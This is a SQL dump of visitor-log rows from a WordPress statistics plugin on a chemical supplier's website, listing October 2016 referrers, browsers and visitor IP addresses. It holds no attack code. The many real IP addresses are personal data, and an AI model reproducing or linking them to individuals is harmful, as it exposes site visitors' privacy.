INSERT INTO `wp_statistics_visitor` VALUES (2112, '2016-10-09', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '52.90.61.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2113, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.117.212.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2114, '2016-10-09', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.91.57.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2115, '2016-10-09', 'https://www.directindustry.com/prod/miller-stephenson-chemical-co/product-173822-1749883.html', 'Firefox', 'Windows', '49.0', '', '73.232.204.165', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2116, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.183.0.49', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2117, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.45.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2118, '2016-10-10', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=quoteup-details-new', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 299, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2119, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '73.232.204.165', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2120, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjh-6O1987PAhXNZj4KHcfgA-UQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.cWw', 'MSIE', 'Windows', '11.0', '', '50.187.82.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2121, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '90.193.254.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2122, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.173.63.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2123, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2124, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.86.105.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2125, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.94', '', '184.173.211.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2126, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2127, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.159.137.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2128, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '32.210.132.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2129, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '104.222.35.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2130, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2131, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2132, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '69.84.115.247', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2133, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.9.221.110', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2134, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '87.138.193.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2135, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '26.0.1410.63', '', '158.69.155.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2136, '2016-10-10', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2137, '2016-10-10', 'https://mschem.com/robots.txt', 'Chrome', 'Windows', '34.0.1847.131', '', '45.55.229.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2138, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2139, '2016-10-10', 'https://www.google.com/aclk?sa=L&ai=DChcSEwinu5TNiM_PAhWHlX4KHbUXB_IYABAG&sig=AOD64_1gKpZeZI1vIWJ6m3w5b6vMsE2VUQ&rct=j&q=&ved=0ahUKEwjFnZDNiM_PAhVS0mMKHYzxBBcQ0QwIdA&adurl=', 'MSIE', 'Windows', '11.0', '', '104.172.108.237', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2140, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2141, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Linux', '52.0.2743.82', '', '91.233.116.228', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2142, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2143, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2144, '2016-10-10', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '199.30.24.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2145, '2016-10-10', 'https://www.baidu.com/link?url=amxtjrfkxpVd5qTprYAuL3vCBRZ678R-poOCzpze9iQOgJ3dwWIpnZ60CqXL-p9E&wd=&eqid=a2318de10004263a0000000457faf39e', 'Chrome', 'Windows', '45.0.2454.101', '', '124.64.235.112', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2146, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '76.115.42.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2147, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '183.60.15.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2148, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.41.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2149, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '42.80.199.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2150, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.153.214.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2151, '2016-10-10', 'https://www.bing.com/search?q=Miller+Stephenson+MS+122AD&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2152, '2016-10-10', 'https://www.miller-stephenson.com/product/ms-122ad/', 'MSIE', 'Windows', '9.0', '', '204.79.180.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2153, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '24.136.30.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2154, '2016-10-10', 'https://www.google.co.id/', 'Chrome', 'Windows', '53.0.2785.143', '', '36.73.62.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2155, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '210.6.7.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2156, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.3.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2157, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.91.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2158, '2016-10-10', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Chrome', 'Windows', '48.0.2564.97', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2159, '2016-10-10', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Chrome', 'Windows', '47.0.2526.111', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2160, '2016-10-10', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Chrome', 'Windows', '48.0.2564.109', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2161, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '71.174.151.197', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2162, '2016-10-10', 'https://search.aol.com/aol/search?page=5&query=+966%20%20mech%C4%B1nary%20company%20ltd%20contact%20us%20mail', 'MSIE', 'Windows', '11.0', '', '31.209.110.6', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2163, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2164, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '188.106.76.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2165, '2016-10-10', 'https://translate.googleusercontent.com/translate_p?hl=es&prev=search&sl=en&u=https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/&depth=1&rurl=translate.google.com.mx&usg=ALkJrhgAAAAAV_sDIvSXTsyHnDsYDFuOdfQBfhnKu4-D', 'Chrome', 'Windows', '53.0.2785.143', '', '201.153.224.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2166, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2167, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '108.131.73.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2168, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.85.170.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2169, '2016-10-10', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.1.9', '', '104.246.2.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2170, '2016-10-10', 'https://www.bing.com/search?q=EPON+1001+&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2171, '2016-10-10', 'https://www.miller-stephenson.com/product/epon-1001-x-75/', 'MSIE', 'Windows', '9.0', '', '204.79.180.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2172, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '191.96.250.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2173, '2016-10-10', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '191.96.250.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2174, '2016-10-10', 'https://x-musics.com/', 'MSIE', 'Windows', '5.5', '', '46.118.118.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2175, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '4.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2176, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '34.0.1847.131', '', '104.236.69.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2177, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '104.236.69.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2178, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '35.0.1916.114', '', '104.236.69.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2179, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '104.236.69.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2180, '2016-10-10', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'Firefox', 'Windows', '28.0', '', '104.236.69.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2181, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '75.86.50.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2182, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.241.58.135', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2183, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.65.243.192', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2184, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2185, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '114.55.238.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2186, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '190.239.214.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2187, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.45.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2188, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '40.78.146.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2189, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.209.188.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2190, '2016-10-10', 'https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiG48nMrs_PAhWLPj4KHeuxBhEQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&cad=rja', 'MSIE', 'Windows', '11.0', '', '14.142.62.174', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2191, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '113.99.40.243', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2192, '2016-10-10', 'https://www.miller-stephenson.com', 'XML-RPC', 'Unknown', 'Unknown', '', '113.99.40.243', '000', 3589, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2193, '2016-10-10', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&cad=rja&uact=8&ved=0ahUKEwjZw97ir8_PAhVOtJQKHUpBDOwQFgg0MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA', 'MSIE', 'Windows', '11.0', '', '165.156.28.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2194, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.200.12.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2195, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '68.144.45.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2196, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '8.0', '', '103.206.22.50', '000', 90, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2197, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.38.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2198, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2199, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2200, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.245.212.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2201, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.80.228', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2202, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.23.224.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2203, '2016-10-10', 'https://www.google.ca/search?ei=qh_7V_D0F9D6jwPm2prQAg&q=teflon+grease+for+high+temperature&oq=teflon+grease+for+high+tem&gs_l=mobile-gws-serp.1.0.33i21k1.162538.169534.0.170662.13.11.0.2.2.0.175.1150.4j7.11.0....0...1c.1j4.64.mobile-gws-serp..0.9.964...41j0i19k1j0i30i19k1.kPhGcNxzwtc', 'Chrome', 'Android', '44.0.2403.133', '', '174.1.25.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2204, '2016-10-10', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/product-tag/ms-143te/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwj4xaqtus_PAhWEupQKHdh5Dn4QFggfMAI&usg=AFQjCNH_qRX5kkYzJeiFSAmlU9Yx3fXiRA', 'MSIE', 'Windows', '8.0', '', '61.83.61.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2205, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.131.247.173', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2206, '2016-10-10', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiExJvwwM_PAhUD_WMKHeL2ApwQFggoMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.cGc', 'MSIE', 'Windows', '11.0', '', '125.139.135.144', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2207, '2016-10-10', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '107.158.100.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2208, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '62.202.12.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2209, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2210, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '36.69.155.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2211, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '77.177.15.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2212, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.153.16.152', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2213, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2214, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2215, '2016-10-10', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1205.DpPQV3PIAG_stA4cvAFFfR9wmcYlpw0Ck7Zaw4Du851HHNZ0pLtsFaef28rx6FQi.ed1bdf7d0fd57a850a5921499821138109c3091d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThuR1F5Z3k4clhzQ0czNDdmcUNBX0FvaUJHOGZYeWtVWjFxSkNzRVlvRXpyLWxzY1RNcHFyODZ3&b64e=2&sign=09514c0085442117b78308a3bfcd4144&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6og2jShV9U5ZfCc9qPyC4DT4EGudm8CgUsFHDDyJt0aRQZyKL1b7SC8LrUaFsgL-ZljxIx4Bec12JMaUMccuFL0AKp-EkCoC2sqXMaYq1X0aRjCOv5_FGukBS1Dow2n6w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWbgDHRNa-0yqDwLlxl-uwBAcf-oKy57nyaKzCjWZqA410NS4EtCOFg6SXn6zzoIamwp9mlf-V1P2m4__gqiHvRWlPPqzq-4D4&l10n=ru&cts=1476078342007&mc=7.21866347297', 'MSIE', 'Windows', '8.0', '', '79.165.120.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2216, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '154.73.138.146', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2217, '2016-10-10', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '67.182.148.196', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2218, '2016-10-10', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2219, '2016-10-10', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '37.27.152.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2220, '2016-10-10', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '50.131.218.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2221, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '5.9.76.66', '000', 52, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2222, '2016-10-10', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.205.45.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2223, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '104.239.198.201', '000', 74, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2224, '2016-10-10', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2225, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2226, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '212.52.159.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2227, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '202.65.138.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2228, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '121.224.159.24', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2229, '2016-10-10', 'https://expresstoplivo.ru/', 'Unknown', 'Unknown', 'Unknown', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2230, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '89.255.51.155', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2231, '2016-10-10', 'https://www.google.fr/', 'Chrome', 'Windows', '53.0.2785.143', '', '213.173.165.101', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2232, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.243.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2233, '2016-10-10', 'https://www.google.gr/', 'Firefox', 'Windows', '49.0', '', '213.249.49.158', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2234, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '79.120.228.26', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2235, '2016-10-10', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '113.53.151.37', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2236, '2016-10-10', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '113.53.145.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2237, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.194.164.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2238, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2239, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.39.16.95', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2240, '2016-10-10', 'https://translate.googleusercontent.com/translate_p?hl=ko&prev=search&sl=en&u=https://www.miller-stephenson.com/chemicals/release-agents/&depth=1&rurl=translate.google.co.kr&usg=ALkJrhgAAAAAV_tVmSNH9yzC3DtkpCOjkoXIRhtabfnF', 'Chrome', 'Windows', '53.0.2785.143', '', '210.217.142.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2241, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '75.37.193.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2242, '2016-10-10', 'https://shinikiev.com.ua/', 'MSIE', 'Windows', '6.0', '', '178.137.176.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2243, '2016-10-10', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwj9_4nM7c_PAhVFrRQKHek-CFwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.bGg', 'Firefox', 'Linux', '31.0', '', '90.83.184.49', '000', 54, 0); 
